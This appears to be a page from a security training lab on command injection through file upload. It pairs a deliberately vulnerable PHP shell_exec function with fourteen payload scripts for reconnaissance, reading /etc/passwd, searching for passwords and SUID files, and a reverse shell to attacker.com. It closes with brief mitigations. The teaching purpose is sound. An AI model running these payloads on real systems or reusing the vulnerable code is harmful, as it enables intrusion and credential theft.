Lab 3: Command Injection via File Upload

Command injection attacks through file upload functionality

Difficulty: Medium

Lab Overview

This lab demonstrates command injection vulnerabilities that can be exploited through file upload functionality. Attackers can upload files containing malicious commands or reference uploaded files that get processed and executed on the server.

Objective: Use file upload functionality to achieve command injection and code execution.

Vulnerable Code 
// Vulnerable: Direct execution without validation
function execute_uploaded_command($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}
File Upload
Uploaded Files

No files uploaded yet.

Command Execution
Vulnerability Details
  • Type: Command Injection via File Upload
  • Severity: High
  • Method: POST
  • Issue: Direct execution of uploaded files and commands
File Upload Command Injection Examples
  • malicious.sh - Upload shell script
  • whoami - Basic command
  • cat uploads/file.txt - Read uploaded file
  • bash uploads/script.sh - Execute uploaded script
File Upload Command Injection Payloads

Upload these files to test command injection vulnerabilities:

1. Basic Shell Script (script.sh):
#!/bin/bash echo "Hacked!" whoami id pwd ls -la
2. Information Gathering Script (info.sh):
#!/bin/bash echo "System Information:" echo "User: $(whoami)" echo "ID: $(id)" echo "PWD: $(pwd)" echo "Hostname: $(hostname)" echo "Uname: $(uname -a)" echo "Date: $(date)"
3. File System Access Script (filesystem.sh):
#!/bin/bash echo "File System Access:" echo "Passwd:" cat /etc/passwd echo "Hosts:" cat /etc/hosts echo "Directory Listing:" ls -la /
4. Process Information Script (process.sh):
#!/bin/bash echo "Process Information:" ps aux echo "Network:" netstat -an echo "Disk Usage:" df -h echo "Memory:" free -m
5. Network Information Script (network.sh):
#!/bin/bash echo "Network Information:" ifconfig echo "Routes:" route -n echo "ARP:" arp -a echo "DNS:" nslookup google.com
6. User Information Script (user.sh):
#!/bin/bash echo "User Information:" groups echo "Crontab:" crontab -l echo "History:" history echo "Environment:" env
7. Reverse Shell Script (reverse.sh):
#!/bin/bash bash -i >& /dev/tcp/attacker.com/4444 0>&1
8. Command Execution Script (exec.sh):
#!/bin/bash echo "Command Execution:" whoami id pwd ls -la ps aux netstat -an
9. File Operations Script (fileops.sh):
#!/bin/bash echo "File Operations:" touch /tmp/test.txt echo "test" > /tmp/test.txt cat /tmp/test.txt rm /tmp/test.txt mkdir /tmp/testdir rmdir /tmp/testdir
10. Advanced Commands Script (advanced.sh):
#!/bin/bash echo "Advanced Commands:" find / -name "*.php" 2>/dev/null grep -r "password" /var/www/ 2>/dev/null find / -perm -4000 2>/dev/null find / -writable 2>/dev/null
11. Command Execution via Uploaded Files:
cat uploads/script.sh bash uploads/script.sh chmod +x uploads/script.sh && ./uploads/script.sh source uploads/script.sh
12. File Reading via Uploaded Files:
cat uploads/info.txt head -10 uploads/data.txt tail -10 uploads/log.txt grep "error" uploads/log.txt
13. Process Execution via Uploaded Files:
./uploads/script.sh bash uploads/script.sh sh uploads/script.sh python uploads/script.py
14. File Manipulation via Uploaded Files:
cp uploads/template.txt /tmp/ mv uploads/data.txt /tmp/ ln -s uploads/symlink.txt /tmp/ chmod 755 uploads/script.sh
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper file upload validation and sanitization
  • Use whitelist-based file type validation
  • Avoid direct command execution functions
  • Use parameterized commands and safe APIs
  • Implement proper access controls and permissions
  • Regular security testing and vulnerability assessments
  • Monitor for unusual file upload patterns and content